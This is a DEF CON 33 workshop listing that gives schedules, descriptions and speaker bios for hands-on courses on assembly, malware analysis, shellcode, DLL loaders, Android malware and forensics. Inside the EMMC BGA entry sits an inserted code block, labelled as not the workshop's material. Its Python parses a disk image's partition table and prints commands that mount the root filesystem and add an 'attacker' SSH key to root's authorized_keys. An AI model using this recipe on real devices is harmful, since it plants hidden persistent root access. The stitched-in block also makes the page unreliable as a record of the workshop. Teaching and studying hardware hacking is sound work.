DEF CON Workshops List

Longer, more detailed, hands on, lasting half a day.
These have limited seating. These will fill up VERY quickly!




64-bit Intel Assembly Language Programming for Hackers

Workshop Map Page – LVCCNorth-Level2-N253
When:  Friday, Aug 8, 14:00 – 17:59 PDT

Assembly language has a reputation for being intimidating, but once you learn the basics, and know how to read the documentation, you can easily pick up the rest. There are many interesting fields of study in computer security that depend on the “closer to the metal” knowledge you’ll gain from learning to code in assembly:

  • Software reverse engineering
  • Vulnerability and exploit research
  • Malware/implant development
  • Digital forensics

…among others. There is no substitute for the confidence that you gain from being able to research and understand computer systems at lower levels of abstraction.

The purpose of this workshop is to introduce Intel x64 architecture and assembly language to the attendees. We will be using the Microsoft Macro Assembler, and we will be examining our code step-by-step in the x64dbg debugger. No prior programming experience is required–we will be working on things from first principles. There will be few slides. This is a new version of the workshop that makes better use of the x64dbg debugger to illustrate concepts of the class, live. Attendees can follow along with their own laptops and programming environments.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n253-08p

People:
    SpeakerBio:  Wesley McGrew

Dr. Wesley McGrew is a house music DJ that also directs research, development, and offensive cyber operations as Senior Cybersecurity Fellow for MartinFederal. He has presented on topics of penetration testing and malware analysis at DEF CON and Black Hat USA and teaches self-designed courses on software reverse engineering and assembly language programming. Wesley has a Ph.D. in Computer Science from Mississippi State University for his research in vulnerability analysis of SCADA HMI systems.




Accelerating Malware Analysis with WinDbg Time Travel Debugging

Workshop Map Page – LVCCNorth-Level2-N257
When:  Friday, Aug 8, 09:00 – 12:59 PDT

Malware analysis and reverse engineering involve intricate execution, obfuscation, and anti-analysis techniques that hinder traditional debugging. This intensive, hands-on workshop introduces WinDbg’s powerful Time Travel Debugging (TTD), allowing you to record a complete execution trace and replay it forwards and backwards. Designed for reverse engineers and malware analysts, this workshop provides practical skills to harness TTD, significantly cutting analysis time compared to traditional methods.

Throughout this 4-hour session, dive directly into practical application. Start with TTD essentials and capturing traces (GUI/CLI), then quickly progress to navigating timelines efficiently. Gain proficiency using the Debugger Data Model and LINQ queries to rapidly locate key events, API usage, and suspicious memory patterns within large traces. Crucially, learn to automate analysis by creating powerful JavaScript extensions for WinDbg, applying these skills in hands-on labs focused on tasks like extracting dynamically deobfuscated strings from malware. Leave equipped to confidently integrate WinDbg TTD into your workflow, accelerating your triage and deep-dive analysis capabilities.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n257-08a

People:
    SpeakerBio:  Joshua “jstrosch” Stroschein, Google

Joshua is an experienced malware analyst and reverse engineer and has a passion for sharing his knowledge with others. He is a reverse engineer with the FLARE team at Google, where he focuses on tackling the latest threats. He is an accomplished trainer, providing training at places such as Ring Zero, Black Hat, DEF CON, ToorCon, Hack In The Box, SuriCon, and other public and private venues. He is also an author on Pluralsight, where he publishes content around malware analysis, reverse engineering, and other security related topics.

SpeakerBio:  Jae Young Kim, Google

Jae Young Kim is a Senior Reverse Engineer on Mandiant’s FLARE Team where he reverses malware and contributes to FLARE’s automated analysis and binary similarity efforts. He is a seasoned instructor and a core contributor to FLARE’s educational content development efforts. He has a Bachelors in Computer Science from Columbia University.




Advanced Ghidra Scripting & Automation

Workshop Map Page – LVCCNorth-Level2-N260
When:  Saturday, Aug 9, 09:00 – 12:59 PDT

When you are reverse engineering a file and have to repeatedly perform the same mundane task, you start to wonder how to perform the action automatically. This workshop provides the basis for automating tasks with Ghidra. We will look at a wiper used to target Ukrainian victims in late February 2022.

This four-hour workshop primarily focuses on how to automate repeated activities and how to think in a way that is supported by the analysis framework’s API. You can transfer this knowledge to other reverse engineering suites, although the specific API calls will differ. This class is perfect for aspiring and beginning analysts, while also providing background information and additional techniques for intermediate analysts.

The workshop’s materials consist of multiple malware samples, the precautions for which will be explained in detail during the workshop, ensuring the safety and integrity of the attendees’ systems. An x86_64 laptop with Ubuntu 22.04 or later, along with Ghidra, Eclipse, and OpenJDK 21, is required. It’s mandatory to be able to understand the basics of assembly language and decompiled code, and to be able to read and write Java. Python 2 can be used as a substitute if desired, but is not fully supported.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n260-09a

People:
    SpeakerBio:  Max “Libra” Kersten, Trellix

Max Kersten is a malware analyst, blogger, and speaker who aims to make malware analysis more approachable for those who are starting. In 2019, Max graduated cum laude with a bachelor’s in IT & Cyber Security, during which Max also worked as an Android malware analyst. Currently, Max works as a senior malware analyst at Trellix, where he analyses APT malware and creates open-source tooling to aid such research. Over the past few years, Max spoke at international conferences, such as DEFCON, Black Hat (USA, EU, MEA, Asia), Botconf, Confidence-Conference, HackYeahPL, and HackFestCA. Additionally, he gave guest lectures and workshops for DEFCON, Botconf, several universities, and private entities.




Analyzing and Creating Windows Shellcode for Hackers

Workshop Map Page – LVCCNorth-Level2-N256
When:  Friday, Aug 8, 14:00 – 17:59 PDT

Get ready to leap into the wild world of Windows shellcode! This fast-paced workshop covers how to analyze and create shellcode, using state-of-the-art tools. Intended for those with intermediate knowledge, this workshop will review x86 assembly; you will learn Windows internals and advanced shellcoding techniques. You’ll learn how to dissect shellcode with x32Dbg or WinDbg and how to use the SHAREM shellcode emulator for deep analysis and disassembly. After analyzing several samples, we’ll build our own shellcode, starting simple and moving on to intermediate multi-API shellcode. You will learn how to encode your shellcode for evasion, and how to incorporate Windows syscalls directly into your shellcode for extra stealth. Finally, we will cover converting DLLs to shellcode. Expect to be made privy to a variety of shellcoding tips and tricks.

By the end, you’ll be able to:

  • Quickly read and debug obfuscated shellcode
  • Implement GetPC techniques in shellcode
  • Chain WinAPIs to pass handles/pointers
  • Add direct Windows syscalls for stealth to shellcode
  • Convert DLLs to shellcode with sRDI

Prep: Study x86 assembly and basic Windows debugging. We recommend a Windows VM with Windows Defender disabled, plus NASM, x32Dbg, WinDbg (classic), SHAREM, and ShellWasp.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n256-08p

People:
    SpeakerBio:  Bramwell Brizendine, Director at VERONA Lab

Dr. Bramwell Brizendine has a Ph.D. in Cyber Operations and is the Director of the VERONA Lab. Bramwell has regularly spoken at DEFCON and presented at all regional editions of Black Hat (USA, Europe, Asia, MEA), as well as at Hack in the Box Amsterdam and Wild West Hackin’ Fest. Bramwell received a $300,000 NSA research grant to create the SHAREM shellcode analysis framework, which brings unprecedented capabilities to shellcode analysis. He has additionally authored ShellWasp, which facilitates using Windows syscalls in shellcode, as well as two code-reuse attack frameworks, ROP ROCKET and JOP ROCKET. Bramwell has previously taught undergraduate, master’s, and Ph.D. courses on software exploitation, reverse engineering, offensive security, and malware analysis. He currently teaches cybersecurity courses at the University of Alabama in Huntsville.

SpeakerBio:  Austin Norby, Director of Internal Research and Development at Bogart Associates

Dr. Austin Norby is a seasoned cybersecurity professional with over a decade of experience supporting the Department of Defense. He earned his bachelor’s degrees in mathematics and computer science from the University of Minnesota, a master’s degree from the Naval Postgraduate School, and a Doctorate in Cyber Operations from Dakota State University, specializing in anti-debugging techniques. Currently, Dr. Norby serves as the Director of Internal Research and Development at Bogart Associates, where he is responsible for spearheading the creation of advanced cybersecurity solutions for government use. His technical proficiencies include reverse engineering, malware analysis, and software engineering, with a strong focus on developing robust cyber capabilities in C, C++, Intel assembly, and Python.

SpeakerBio:  Logan Cannan, Ph.D. Candidate, University of Alabama in Huntsville 

Logan Cannan received the B.S. and M.S. degrees in Computer Engineering and Cybersecurity from the University of Alabama in Huntsville. He is currently a Ph.D. candidate for a degree in Computer Engineering in a joint degree program with the University of Alabama at Birmingham and the University of Alabama in Huntsville. After spending time at Idaho National Laboratory, working in both ICS vulnerability analysis and machine learning assisted code analysis, he focused his dissertation research on optimization for machine learning on binary analysis and reverse engineering tasks.




Cloud Forensics Workshop: Smart Grid Edition

Workshop Map Page – LVCCNorth-Level2-N256
When:  Sunday, Aug 10, 09:00 – 12:59 PDT

Every watt and bit tells a story.

The concept of “smart grids” dates back to the 1970s with automatic meters, but the term emerged with the Energy Independence and Security Act of 2007. Since 2012, the integration of smart grids and Cloud computing has been a topic at IEEE meetings. This raises key questions: How do we assess risks to physical and virtual infrastructure? What are the impacts of a breach? Where does digital forensics fit in?

Since 2017, the Cloud Forensics Workshop has introduced security professionals to core Cloud forensics concepts. The latest Smart Grid Edition explores the relationship between smart grids, Cloud computing, and digital forensics. Participants will engage in hands-on labs using open-source tools to identify indicators of compromise (IoCs), acquire forensically sound artifacts, and apply AI and automation in investigations. Registered students will download sample data before the workshop and apply their skills in a live tabletop exercise.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n256-10a

People:
    SpeakerBio:  Kerry “Professor Kilroy” Hazelton

Kerry Hazelton – also known as “Professor Kilroy” – has been involved in the technology and security industry for over twenty-five years crafting his own version of “Protection Against the Dark Arts” with an extensive knowledge of information systems, data center operations, Cloud computing, digital forensics, and incident response.

Ever the security enthusiast and a sucker for movie references, combined with a deep passion for teaching and mentoring; Mr. Hazelton created the Cloud Forensics Workshop and CTF Challenge in 2017, which is a technical workshop that focuses on learning about the science of Cloud forensics and its real-world applications, followed by a Capture-the-Flag competition to gauge his students’ comprehension and critical-thinking skills by solving multiple forensic puzzles in a race against each other within the allotted amount of time.

He can be found posting his random thoughts on gaming, hacking, or life in general somewhere on the medium known as the Internet.




Contextualizing alerts with relevant logs and events without queries or LLMs

Workshop Map Page – LVCCNorth-Level2-N252
When:  Friday, Aug 8, 14:00 – 17:59 PDT

This workshop is for SOC analysts, threat hunters, and defenders dealing with alert fatigue, fragmented telemetry, and the challenge of spotting coordinated attacks. Instead of large language models or costly vendor tools, we’ll use open-source, explainable ML to map alerts, logs, and events into contextualized attack stories.

Attendees will work hands-on with real-world-style data to find root causes, build kill chains, and generate actionable tickets—False Positive, Incident, and Attack Story—that mirror real SOC workflows. We’ll use the Attack Flow Detector tool, which runs in Google Colab—no install needed.

No data science experience required. The class is technical but beginner-friendly, with guided exercises and examples. Basic knowledge of logs and MITRE ATT&CK helps but isn’t required. The focus is on outcomes: understanding what happened, why, and how to respond—without black-box AI or complex queries.

By the end, students will know how to clean noisy data, map alerts to attacker techniques, cluster related events, and build end-to-end attack narratives. All tools and content are open-source, transparent, and ready to use in real environments.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n252-08p

People:
    SpeakerBio:  Ezz Tahoun

Ezz Tahoun is an award-winning cybersecurity data scientist recognized globally for his innovations in applying AI to security operations. He has presented at multiple DEFCON villages, including Blue Team, Cloud, Industrial Control Systems (ICS), Adversary, Wall of Sheep, Packet Hacking, Telecom, and Creator Stage, as well as BlackHat Sector, MEA, EU, and GISEC. His groundbreaking work earned him accolades from Yale, Princeton, Northwestern, NATO, Microsoft, and Canada’s Communications Security Establishment. At 19, Ezz began his PhD in Computer Science at the University of Waterloo, quickly gaining recognition through 20 influential papers and 15 open-source cybersecurity tools. His professional experience includes leading advanced AI-driven projects for Orange CyberDefense, Forescout, RBC, and Huawei Technologies US. Holding certifications such as aCCISO, CISM, CRISC, GCIH, GSEC, CEH, and GCP-Cloud Architect, Ezz previously served as an adjunct professor in cyber defense and warfare.




Creating malicious functional app on Android

Workshop Map Page – LVCCNorth-Level2-N255
When:  Sunday, Aug 10, 09:00 – 12:59 PDT

This workshop provides an in-depth, hands-on experience in the creation and analysis of malicious applications, focusing on the techniques used by attackers to compromise mobile devices. Participants will learn how to manipulate Android applications using tools such as Android Studio, APKTool, Burp Suite, and Metasploit to inject payloads, bypass security mechanisms, and establish remote access. Through step-by-step demonstrations, they will explore methods for obfuscation, privilege escalation, and persistence, gaining a clear understanding of how adversaries exploit vulnerabilities in mobile environments.

Beyond offensive techniques, the workshop emphasizes defensive strategies, equipping attendees with skills to detect, analyze, and mitigate mobile threats. Using malware analysis and reverse engineering, students will learn how security professionals track, neutralize, and prevent attacks. Real-time lab exercises will reinforce these concepts, ensuring that participants leave with practical expertise applicable to ethical hacking, penetration testing, and security research. This session is ideal for cybersecurity professionals, developers, and researchers looking to deepen their knowledge of mobile security and ethical hacking methodologies.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n255-10a

People:
    SpeakerBio:  HackeMate, Offensive Cybersecurity Engineer

HackeMate is the YouTube channel where Gianpaul Custodio, an Offensive Cybersecurity Engineer, shares his expertise in ethical hacking, as well as offensive and defensive security. With over 28,000 subscribers engaged in the world of cybersecurity, he has established himself as a key figure in the community through challenges, technical analyses, and hands-on demonstrations.

Professionally, he holds Red Team certifications such as the eLearnSecurity Junior Penetration Tester (eJPT) and Web Penetration Tester (eWPT), along with Blue Team certifications like Microsoft Azure Fundamentals (AZ-900) and Microsoft Security, Compliance, and Identity Fundamentals (SC-900). He is also a Google Product Expert for Google Drive, contributing his knowledge in cloud security and optimization.




Deep-dive into modern network fingerprinting

Workshop Map Page – LVCCNorth-Level2-N260
When:  Saturday, Aug 9, 14:00 – 17:59 PDT

In this hands-on workshop you’ll move beyond the theory of network fingerprinting and actually use fingerprints in practice at both the TCP and TLS layers. Working in live lab environments, you will:

  1. Capture real TLS ClientHello and TCP handshake packets with muonfp, p0f, ja3, ja3n and ja4
  2. Normalize the JA3 into JA3n, overcoming TLS extension shuffle of modern browsers
  3. Translate MuonFP fingerprint detections into classic p0f signatures
  4. Compile those signatures into BPF and iptables bytecode to dynamically block scanners
  5. Detect & block mass-scan traffic from ZMap and Masscan in real time without interrupting any other traffic.
  6. Forge your own fingerprints (Windows, Linux, common browsers) with Scapy, then validate that your defenses can’t tell you apart.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n260-09p

People:
    SpeakerBio:  Vlad Iliushin, Researcher at ELLIO

Vlad is the co-founder and cybersecurity expert at ELLIO and President of the Anti-Malware Testing Standards Organization (AMTSO). A true cybersecurity enthusiast, Vlad’s passionate about network security, IoT, and cyber deception. Before ELLIO, he founded and led the Avast IoT Lab (now Gen Digital), developing security features and researching IoT threats. He has spoken at many conferences, including Web Summit and South by Southwest (SXSW), where he demonstrated IoT vulnerabilities.




Defeating Malware Evasion: Techniques and Countermeasures

Workshop Map Page – LVCCNorth-Level2-N258
When:  Saturday, Aug 9, 14:00 – 17:59 PDT

This workshop is designed to give students the skills they need to identify and defeat common evasion techniques used by malware. It’s broken up into three hands-on modules where students will work with a range of open-source (or otherwise free) tools to dig into malicious code, examine different evasion techniques, and learn how to circumvent them to better understand how the malware operates. We’ll be using a mix of instructor-created malware samples—with full source code provided so students can analyze both the binary and the code side-by-side—and real-world samples found in the wild. By the end of the workshop, students will walk away with several malware samples, pages of code to keep digging into on their own, and a solid toolkit of techniques for breaking through typical anti-analysis and evasion tricks used in modern malware.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n258-09p

People:
    SpeakerBio:  Kyle “d4rksystem” Cucci, Staff Security Research Engineer @ Proofpoint

Kyle Cucci is a malware analyst and detection engineer with Proofpoint’s Threat Research team. Previously, he led the forensic investigations and malware research teams at a large global bank. Kyle is the author of the book “Evasive Malware: A Field Guide to Detecting, Analyzing, and Defeating Advanced Threats” and is a regular speaker at conferences, speaking on topics like malware analysis, offensive security, and security engineering. In his free time, Kyle enjoys contributing to the community via open source tooling, research, and blogging.

SpeakerBio:  Randy Pargman, Director, Threat Detection @ Proofpoint

Randy leads threat detection and engineering teams at Proofpoint, using custom dynamic sandbox systems to detect evasive malware and phishing threats that target customers around the world. He previously led threat hunting and endpoint detection engineering at Binary Defense, and investigated botnets and other cyber criminal activities as a member of the FBI Cyber Action Team and Seattle Cyber Task Force. Randy currently volunteers as a digital forensic analyst with The DFIR Report, and organizes DEATHCon, a global conference for Detection Engineering and Threat Hunting workshops.




Disrupting Digital Dataflows: A 101 on how 2 detect, analyze, & disrupt digital systems by reverse engineering real-world Electronic Warfare techniques from Ukraine at the hardware level

Workshop Map Page – LVCCNorth-Level2-N257
When:  Sunday, Aug 10, 09:00 – 12:59 PDT

This hands-on technical training dives deep into the mechanics and mitigation of signal jamming—an increasingly critical threat in both civilian and military communication systems. Attendees will explore the electromagnetic spectrum, modulation techniques, and the physical principles that enable signal jamming. We will analyze common types of jammers, their circuitry, and how they disrupt RF communications. Participants will also gain insight into detection methods, spectrum analysis, and counter-jamming strategies using SDRs and directional antennas. The course balances theory and practice, with live demonstrations and dissection of real-world jamming scenarios. Prior familiarity with RF fundamentals and basic electronics is helpful but not required. To get the most from this session, attendees are encouraged to review basic electromagnetic theory and brush up on SDR tools like GNU Radio or SDR# ahead of time. This session is ideal for cybersecurity professionals, drone operators, RF engineers, and technical hobbyists seeking to understand and combat one of the most disruptive tools in electronic warfare.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n257-10a

People:
    SpeakerBio:  Preston Zen, 1337sheets.com

Preston Zen is an OSCE3-certified cybersecurity maker and breaker of all things technology, from custom electronics to bespoke software. He has been a humanitarian volunteer in Ukraine since 2022 in logistics and engineering, as well as one of the leading innovators of field-implemented technology use cases.




Dive into Windows Library Loading

Workshop Map Page – LVCCNorth-Level2-N258
When:  Friday, Aug 8, 14:00 – 17:59 PDT

DLL loading is one of the most important parts of the Windows system. When you install, run, use, or hack a system, you will always use DLLs. This DLL mechanism has been exploited for several years for malware development through several techniques (DLL injection, reflective DLL), but do you really know how Windows loads a DLL? The sections used, the internal structures, and how the dependencies are resolved? Are you able to design your own Perfect DLL Loader that fully integrates with the WIN32API?

In this workshop, you will dive into the Windows DLL mechanism to understand how all of it works internally. With a decompiler, trial and error, step by step, you will build your own (almost) Perfect DLL loader. You will try to load everything from the simple AMSI.DLL to the most complex WINHTTP.DLL. At each step, you will dive deeper into the Windows internals. Malware developers, you will be able to use this code as a PE loader that has never failed me over the last few years, and a DLL loader that does not raise the LoadImage kernel callback, which you can use in your own C2 beacon.

WARNING: while this is a Windows internals DISCOVERY course, it is still a HIGHLY TECHNICAL workshop. You should have some entry-level knowledge of Windows systems, C programming, and reverse engineering to fully enjoy the workshop.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n258-08p

People:
    SpeakerBio:  Yoann “OtterHacker” DEQUEKER, RedTeam Leader at Wavestone

Yoann Dequeker (@OtterHacker) is a red team operator at Wavestone, certified OSCP and CRTO. Aside from his RedTeam engagements and his contributions to public projects such as Impacket, he spends time working on malware development to ease beacon deployment and EDR bypass during engagements, and is currently developing a fully custom C2.

His research has led him to present his results at several conferences such as LeHack (Paris), Insomni’hack, and BlackAlps (Switzerland), as well as through a 4-hour malware workshop at Defcon31 and Defcon32 (Las Vegas). Throughout the year, he publishes several white papers on the techniques he discovered or upgraded and the vulnerabilities he found in public products.




DIY Malware Emulation: Build It, Break It, Detect It

Workshop Map Page – LVCCNorth-Level2-N252
When:  Sunday, Aug 10, 09:00 – 12:59 PDT

Real threats leave behind real artifacts — and in this hands-on workshop, we’ll combine malware development and analysis by safely recreating and dissecting a custom malware based on Lumma Stealer, one of today’s most active malware families. This approach is designed to support adversary emulation efforts by replicating real-world TTPs in a controlled environment, while also teaching participants how to detect and analyze each technique. Whether you’re on a red or purple team looking to simulate attacker behavior, or on a blue team aiming to strengthen detection capabilities, this workshop delivers practical skills grounded in real-world threats.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n252-10a

People:
    SpeakerBio:  Sebastian Tapia

Sebastian breaks things to understand them—and sometimes to teach others how to do it better. He’s spent years in red teaming, malware reversing, and purple team exercises—learning how attackers think, and how defenders can think better. These days, he builds labs, breaks code, and shares what he learns so others can level up, too.

SpeakerBio:  Ricardo Sanchez

Ricardo Sanchez is an accomplished cybersecurity professional with a passion for empowering others through knowledge sharing. As a Security Architect at one of Peru’s leading insurance companies, he specializes in designing innovative technology strategies for threat intelligence, detection engineering, and threat hunting to combat evolving cyber threats. Committed to lifelong learning, Ricardo thrives on analyzing malware and staying at the forefront of cybersecurity advancements.




Effectively Detecting Modern Malware with Volatility 3

Workshop Map Page – LVCCNorth-Level2-N253
When:  Friday, Aug 8, 09:00 – 12:59 PDT

Volatility 3 is the latest version of the Volatility Memory Analysis framework and is a complete re-design and rewrite of the framework suited to meet the needs of modern investigations. In this workshop, students will learn Volatility 3’s new features aimed at efficiency and usability as well as all the new and updated Windows plugins capable of detecting modern malware. During the workshop, students will experience a mix of lecture and live demonstration about the latest malware techniques followed by hands-on labs that will require students to analyze infected memory samples. While students complete each lab, instructors will walk to each student’s station to ensure they are progressing. An instructor will also completely walk through each lab live, and students are given a 35+ page PDF lab guide that contains all the lab scenarios, questions, and detailed answers, including many screenshots and explanations. Students can then use the course slides and lab guide to practice labs over time as well as to guide real-world investigations of compromised systems. By attending this workshop, students will leave knowing the most effective ways to detect modern Windows malware using the latest version of the most widely used open-source framework for memory analysis.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n253-08a

People:
    SpeakerBio:  Andrew Case, Director of Research at Volexity

Andrew Case is the Director of Research at Volexity and has significant experience in incident response handling, digital forensics, and malware analysis. Case is a core developer of Volatility, the most widely used open-source memory forensics framework, and a co-author of the highly popular and technical forensics analysis book “The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory.” Case has spoken at many industry conferences, including DEF CON, Black Hat, RSA, DFRWS, SecTor, BSides*, and OMFW.

SpeakerBio:  Lauren Pace, Computer Science PhD Student at LSU

Lauren Pace is a PhD Student Researcher at Louisiana State University. She is a recipient of a Scholarship for Service scholarship and is performing funded research on complex problems and topics in memory forensics. Lauren has delivered Volatility 3 workshops at conferences, such as DFRWS, and is actively involved in her local cybersecurity clubs and community.

SpeakerBio:  Daniel Donze

Daniel Donze (He/Him) is a PhD Student Researcher in Computer Science at Louisiana State University. His research has previously contributed to the Volatility Framework, and his current interests include memory forensics and malware analysis. He has presented research at BSides Las Vegas as well as several local events. He previously worked as a fullstack web and software developer and security researcher. His hobbies include cooking, playing guitar, mixology and craft beer.




Eliminating Bug Classes at Scale: Leveraging Browser Features for Proactive Defense

Workshop Map Page – LVCCNorth-Level2-N254
When:  Saturday, Aug 9, 09:00 – 12:59 PDT

Traditional patching has failed to scale – it’s time for a new approach. This hands-on workshop teaches you to eliminate entire bug classes with modern browser security features instead of endlessly reacting to reports. Instead of firefighting the same issues, you’ll learn how Content-Security-Policy v3, Trusted Types, and Sec-Fetch-Metadata go beyond traditional OWASP recommendations to prevent vulnerabilities at scale.

You’ll work with a training app that’s already secured, but we’ll go further. By applying advanced browser defenses, testing effectiveness, and enforcing security at scale, you’ll experience firsthand how modern web standards protect both new and legacy systems.

This isn’t just about fixing issues – it’s about scaling security across an organization. We’ll explore measuring adoption across hundreds of services, automating enforcement, and applying defense-in-depth beyond single vulnerabilities.

Through interactive group challenges, you’ll tackle real-world vulnerabilities, enforce modern safeguards, and transform how you approach web security. Whether you’re a developer, security engineer, or architect, you’ll leave with practical tools and a proactive security mindset – moving from patching to prevention.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n254-09a

People:
    SpeakerBio:  Javan Rasokat, Application Security Architect and Security Researcher

Javan is a Senior Application Security Specialist at Sage, helping product teams enhance security throughout the software development lifecycle. On the side, he lectures Secure Coding at DHBW University in Germany. His journey as an ethical hacker began young, where he began to automate online games using bots and identified security bugs, which he then reported to the game operators. Javan made his interests into his profession and began as a full stack web and mobile engineer before transitioning into a passionate security consultant. Javan holds a Master’s degree in IT Security Management and several certifications, including GXPN, AIGP, CISSP, CCSP, and CSSLP. He has shared his research at conferences, including OWASP Global AppSec, DEFCON, and HITB.




EMMC BGA Secrets, hack bga memory, no reballing necessary: Learn how to safely remove EMMC memory modules, hack them and then reinstall, without the difficult process of trying to reball the BGA.

Workshop Map Page – LVCCNorth-Level2-N260
When:  Sunday, Aug 10, 09:00 – 12:59 PDT

EMMC is a common flash memory format for more complex embedded devices, and the Ball Grid Array (BGA) is a popular package for EMMC modules. BGA modules can be intimidating to hardware hackers since the pins are not exposed and instead sit underneath the chip. This workshop will demonstrate, and let you practice, removing EMMC modules from an inexpensive circuit board using flux and a hot air station. The module holds a Linux operating system for a Raspberry Pi. Workshop participants will learn how to image the removed EMMC, mount and modify the Linux filesystem to backdoor the image and gain access, and then copy the image to a new EMMC. Participants will then learn how to attach the module to a BGA carrier board with hot air.

A basic understanding of soldering is all that is required to be successful in this workshop. An understanding of the Linux filesystem is also helpful, but not required. We will have step by step instructions and will also have a small prize for the participant who comes up with and demonstrates the most clever Linux backdoor on their Raspberry Pi.

At the end of this workshop, participants will have an understanding of:

  • How to remove, clean and image BGA modules
  • Basics of offline Linux filesystem hacking
  • How to image and reattach BGA EMMC modules
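An added example, not the workshop's material: once the EMMC is imaged (for instance with dd from a USB reader on the carrier board), the first thing you need is the byte offset of the root filesystem inside the raw dump, because that is what `mount -o loop,offset=` wants. This Python parses the MBR partition table of the image, picks the Linux partition and lists the mount and backdoor steps. The image path, mountpoint and SSH key are placeholders, and the sample MBR built at the bottom is constructed to resemble a Raspberry Pi card (FAT boot partition followed by a Linux root). A GPT-partitioned disk shows up as a single 0xEE protective entry and needs a GPT parser instead.

```python
import struct

SECTOR = 512
# Partition type bytes that matter for a Raspberry Pi style image
TYPE_NAMES = {0x0B: "FAT32 (boot)", 0x0C: "FAT32 LBA (boot)", 0x83: "Linux", 0xEE: "GPT protective"}


def parse_mbr(image: bytes) -> list:
    """Parse the four primary partition entries of an MBR-partitioned dump.

    Returns one dict per used entry with the LBA start, sector count and the
    byte offset to hand to `mount -o loop,offset=...`. A missing 0x55AA
    signature raises, so a bad read (wrong voltage, lifted pad) is caught
    before you try to mount garbage."""
    if len(image) < SECTOR or image[510:512] != b"\x55\xaa":
        raise ValueError("no MBR signature: dump is not a valid image")
    parts = []
    for i in range(4):
        entry = image[446 + 16 * i: 446 + 16 * (i + 1)]
        # status(1) CHS(3) type(1) CHS(3) LBA start(4, LE) sector count(4, LE)
        status, ptype, lba_start, sectors = struct.unpack("<B3xB3xII", entry)
        if ptype == 0 or sectors == 0:
            continue
        parts.append({
            "index": i + 1,
            "type": ptype,
            "name": TYPE_NAMES.get(ptype, f"0x{ptype:02x}"),
            "bootable": status == 0x80,
            "lba_start": lba_start,
            "sectors": sectors,
            "offset": lba_start * SECTOR,
            "size": sectors * SECTOR,
        })
    return parts


def rootfs_partition(parts: list) -> dict:
    """Pick the Linux partition (type 0x83) that holds /etc, /root and friends."""
    linux = [p for p in parts if p["type"] == 0x83]
    if not linux:
        raise ValueError("no Linux partition; GPT (0xEE) or LVM dumps need other tooling")
    return linux[0]


def mount_plan(image_path: str, part: dict, mountpoint: str = "/mnt/emmc") -> list:
    """Shell steps to mount the partition read-write and drop an SSH backdoor.
    The authorized_keys line is a placeholder; substitute your own public key.
    On Raspberry Pi OS the empty `ssh` file that enables sshd lives on the FAT
    boot partition, so that one is mounted separately with its own offset."""
    return [
        f"sudo mount -o loop,offset={part['offset']},sizelimit={part['size']} {image_path} {mountpoint}",
        f"sudo mkdir -p {mountpoint}/root/.ssh && sudo chmod 700 {mountpoint}/root/.ssh",
        f"echo 'ssh-ed25519 AAAA... attacker' | sudo tee -a {mountpoint}/root/.ssh/authorized_keys",
        f"sudo umount {mountpoint}",
    ]


def build_sample_mbr() -> bytes:
    """Constructed MBR: 256 MiB FAT boot partition at LBA 8192, Linux root after it."""
    mbr = bytearray(SECTOR)

    def entry(i, status, ptype, start, count):
        mbr[446 + 16 * i: 446 + 16 * (i + 1)] = struct.pack("<B3xB3xII", status, ptype, start, count)

    entry(0, 0x80, 0x0C, 8192, 524288)
    entry(1, 0x00, 0x83, 532480, 15000000)
    mbr[510:512] = b"\x55\xaa"
    return bytes(mbr)


if __name__ == "__main__":
    parts = parse_mbr(build_sample_mbr())   # real use: parse_mbr(open("emmc.img", "rb").read(512))
    for p in parts:
        print(f"p{p['index']}: {p['name']:18} start LBA {p['lba_start']:>8}  offset {p['offset']:>12}  size {p['size'] >> 20} MiB")
    for cmd in mount_plan("emmc.img", rootfs_partition(parts)):
        print(cmd)
```

Image the whole chip, not just the first partition, and work on a copy: you need the untouched original to write back to a fresh module if your edit leaves the filesystem unbootable.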

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n260-10a

People:
    SpeakerBio:  Patrick “Gigstorm” Kiley, Principal Red-Team Consultant at Mandiant/Google

Patrick is a Principal Red Team Consultant at Mandiant with over 20 years of information security experience working with both US Government and private sector employers. Patrick has spoken at DEF CON, BlackHat, Bsides and RSA. Patrick can usually be found in the Car Hacking or Aerospace Village, where he has volunteered for several years. His passion is embedded systems security; he has released research in avionics and embedded systems, and even bricked his own Tesla while trying to make it faster.




Fine Tune your personal LLM assistant to Secure coding

Workshop Map Page – LVCCNorth-Level2-N260
When:  Friday, Aug 8, 14:00 – 17:59 PDT

In today’s landscape, generative AI coding tools are powerful but often insecure, raising concerns for developers and organizations alike. This hands-on workshop will guide participants in building a secure coding assistant tailored to their specific security needs.

We’ll begin by exploring the security limitations of current AI coding tools and discussing why fine-tuning is critical for secure development. Participants will then create and fine-tune their own LLM-based assistants using provided examples and their own use cases. By the end of the session, each attendee will have a functioning, security-focused AI coding assistant and a clear understanding of how to improve it further.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n260-08p

People:
    SpeakerBio:  Or Sahar, Security Researcher

Or Sahar is a security researcher, software engineer, and cofounder of Secure From Scratch — a venture dedicated to teaching developers secure coding from the very first line of code. She has worked for many years as a developer and developer team leader, before transitioning her career path to focus on hacking, application vulnerability research and security in the context of AI. Or is currently pursuing a master’s degree in computer science and lectures in several colleges.

SpeakerBio:  Yariv Tal, Security Researcher

Yariv Tal is a senior developer and security researcher, and the cofounder of Secure From Scratch, a venture dedicated to teaching developers secure coding from the very first line of code. A summa cum laude graduate of the Technion with four decades of programming expertise and years of experience in university lecturing and bootcamp mentoring, he brings a developer's perspective to the field of security. He currently lectures on secure coding at several colleges and in the private sector, leads the owasp-untrust project, and is pursuing a master's degree in computer science.




